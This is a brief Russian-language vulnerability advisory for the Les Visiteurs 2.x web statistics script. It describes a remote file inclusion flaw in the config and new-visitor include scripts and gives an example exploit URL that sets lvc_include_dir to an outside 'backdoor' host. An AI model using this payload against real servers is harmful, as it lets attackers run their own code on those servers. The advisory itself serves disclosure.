Программа: Les Visiteurs 2.x 

Уязвимость обнаружена в Les Visiteurs. Злонамеренный пользователь может получить доступ к системе.
Сценарии «include/new-visitor.inc.php» и «include/config.inc.php» не проверяют фактическое расположение сценариев lang/ .inc.php и db/db_mysql.inc.php, представленных а параметре lvc_include_dir. 

Пример/Эксплоит:

http://host/path/include/config.inc.php ?lvc_include_dir=http://backdoor/



Оставить мнение